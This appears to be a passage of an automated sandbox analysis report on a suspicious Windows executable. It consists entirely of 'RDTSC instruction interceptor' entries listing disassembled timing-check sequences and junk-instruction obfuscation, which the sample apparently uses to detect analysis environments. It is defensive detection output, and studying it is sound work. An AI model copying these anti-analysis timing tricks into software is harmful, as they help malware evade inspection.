                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668FF3 second address: 668FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 66997D second address: 669982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 669982 second address: 669993 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FC69CE9FC56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 669993 second address: 669997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 66EAF0 second address: 66EB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CE9FC61h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 671571 second address: 67157D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 67157D second address: 671587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 671587 second address: 6715A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC69CB9B4B7h 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6A5129 second address: 6A5135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FC69CE9FC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6A5135 second address: 6A514B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC69CB9B4ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6A514B second address: 6A5156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6A5156 second address: 6A5177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6A5177 second address: 6A517B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6A4B70 second address: 6A4B8C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007FC69CB9B4A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jne 00007FC69CB9B4A6h 0x00000013 pop ebx 0x00000014 js 00007FC69CB9B4ACh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6A676D second address: 6A6771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6A6771 second address: 6A6777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AA968 second address: 6AA979 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AA979 second address: 6AA97D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AA97D second address: 6AA9BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push esi 0x0000000c mov dx, F79Fh 0x00000010 pop edx 0x00000011 push 00000004h 0x00000013 adc dl, FFFFFFB6h 0x00000016 push 1CDD30BFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC69CE9FC64h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AA9BE second address: 6AA9C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AABF2 second address: 6AABF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AABF7 second address: 6AAC8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FC69CB9B4A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 jnc 00007FC69CB9B4A8h 0x00000016 pop esi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FC69CB9B4A8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 jmp 00007FC69CB9B4B6h 0x00000037 push dword ptr [ebp+122D2574h] 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007FC69CB9B4A8h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 call 00007FC69CB9B4B4h 0x0000005c push esi 0x0000005d mov dh, ah 0x0000005f pop edx 0x00000060 pop edx 0x00000061 push 6BAE690Bh 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AC68D second address: 6AC691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AC691 second address: 6AC6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CB9B4B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007FC69CB9B4A6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 6AE1B8 second address: 6AE1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 581D76 second address: 581D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 47F02C0 second address: 47F02C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 47F02C7 second address: 47F030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FC69CB9B4ACh 0x0000000f sub ax, 7C38h 0x00000014 jmp 00007FC69CB9B4ABh 0x00000019 popfd 0x0000001a popad 0x0000001b mov dword ptr [esp], ebp 0x0000001e pushad 0x0000001f mov di, 6C26h 0x00000023 mov dl, 24h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 mov si, F87Bh 0x0000002d mov ax, A157h 0x00000031 popad 0x00000032 mov edx, dword ptr [ebp+0Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 47F030F second address: 47F031E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810720 second address: 4810726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810726 second address: 481072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 481072A second address: 4810749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC69CB9B4B4h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810749 second address: 481074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 481074F second address: 4810753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810753 second address: 48107B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC69CE9FC5Ch 0x00000013 adc esi, 38038208h 0x00000019 jmp 00007FC69CE9FC5Bh 0x0000001e popfd 0x0000001f movzx eax, di 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007FC69CE9FC62h 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC69CE9FC67h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48107B8 second address: 48107D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4B4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48107D0 second address: 48107D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48107D4 second address: 481082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f mov bl, ch 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC69CB9B4B3h 0x0000001a or eax, 55EDD26Eh 0x00000020 jmp 00007FC69CB9B4B9h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FC69CB9B4ADh 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48108EC second address: 4810915 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 46F25ED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC69CE9FC66h 0x00000014 pop eax 0x00000015 mov ecx, edx 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810915 second address: 481092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4B3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810970 second address: 4810974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810974 second address: 481097A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 481097A second address: 4810981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4810981 second address: 48109B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, esi 0x00000009 pushad 0x0000000a mov eax, 747C4E71h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007FC69CB9B4ACh 0x00000017 xor ecx, 0329F348h 0x0000001d jmp 00007FC69CB9B4ABh 0x00000022 popfd 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48109B1 second address: 48001C9 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007FC69CE9FC5Bh 0x0000000d leave 0x0000000e jmp 00007FC69CE9FC66h 0x00000013 retn 0004h 0x00000016 nop 0x00000017 cmp eax, 00000000h 0x0000001a setne al 0x0000001d jmp 00007FC69CE9FC52h 0x0000001f xor ebx, ebx 0x00000021 test al, 01h 0x00000023 jne 00007FC69CE9FC57h 0x00000025 sub esp, 04h 0x00000028 mov dword ptr [esp], 0000000Dh 0x0000002f call 00007FC6A12BD3F9h 0x00000034 mov edi, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FC69CE9FC67h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48001C9 second address: 48001ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48001ED second address: 4800213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dh, al 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dh, ah 0x0000000c push edx 0x0000000d mov bx, si 0x00000010 pop esi 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushad 0x00000015 push edi 0x00000016 pop esi 0x00000017 push ebx 0x00000018 pop eax 0x00000019 popad 0x0000001a movsx edx, ax 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800213 second address: 4800219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800219 second address: 4800255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b jmp 00007FC69CE9FC69h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov esi, 23D55843h 0x00000017 push ecx 0x00000018 mov di, D54Ah 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ecx, 20D57169h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800255 second address: 480025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 480025B second address: 4800296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC69CE9FC60h 0x00000011 xchg eax, edi 0x00000012 jmp 00007FC69CE9FC60h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800296 second address: 480029A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 480029A second address: 48002A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48002A0 second address: 48002B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4B2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48002EF second address: 480036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c jmp 00007FC69CE9FC65h 0x00000011 mov dx, cx 0x00000014 popad 0x00000015 inc ebx 0x00000016 pushad 0x00000017 call 00007FC69CE9FC5Fh 0x0000001c mov bh, ch 0x0000001e pop edi 0x0000001f popad 0x00000020 test al, al 0x00000022 jmp 00007FC69CE9FC60h 0x00000027 je 00007FC69CE9FDD5h 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC69CE9FC67h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 480036C second address: 48003B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea ecx, dword ptr [ebp-14h] 0x0000000d jmp 00007FC69CB9B4AAh 0x00000012 mov dword ptr [ebp-14h], edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007FC69CB9B4ADh 0x0000001d pushfd 0x0000001e jmp 00007FC69CB9B4B0h 0x00000023 adc ah, FFFFFF98h 0x00000026 jmp 00007FC69CB9B4ABh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48003E7 second address: 48003F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48003F6 second address: 4800400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov cx, dx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 480052E second address: 4800532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800532 second address: 4800536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800536 second address: 480053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 480053C second address: 4800558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4B8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800558 second address: 4800579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov edi, esi 0x0000000c popad 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC69CE9FC61h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800579 second address: 48005B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC69CB9B4B1h 0x0000000f nop 0x00000010 jmp 00007FC69CB9B4AEh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48005B6 second address: 48005BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48005BA second address: 48005D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48005D7 second address: 4800644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69CE9FC67h 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC69CE9FC5Bh 0x00000016 sub ah, FFFFFFFEh 0x00000019 jmp 00007FC69CE9FC69h 0x0000001e popfd 0x0000001f mov ecx, 0694CF47h 0x00000024 popad 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC69CE9FC69h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800644 second address: 4800649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 48006B8 second address: 4800031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FC69CE9FC5Eh 0x00000010 je 00007FC70F72DBCEh 0x00000016 xor eax, eax 0x00000018 jmp 00007FC69CE7938Ah 0x0000001d pop esi 0x0000001e pop edi 0x0000001f pop ebx 0x00000020 leave 0x00000021 retn 0004h 0x00000024 nop 0x00000025 xor ebx, ebx 0x00000027 cmp eax, 00000000h 0x0000002a je 00007FC69CE9FDB3h 0x00000030 call 00007FC6A12BD0DDh 0x00000035 mov edi, edi 0x00000037 jmp 00007FC69CE9FC67h 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FC69CE9FC65h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800031 second address: 4800049 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov ecx, 6510FB5Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop ebx 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800049 second address: 4800058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC5Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 4800058 second address: 480005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 480005C second address: 480006B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exe  RDTSC instruction interceptor: First address: 480006B second address: 4800079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
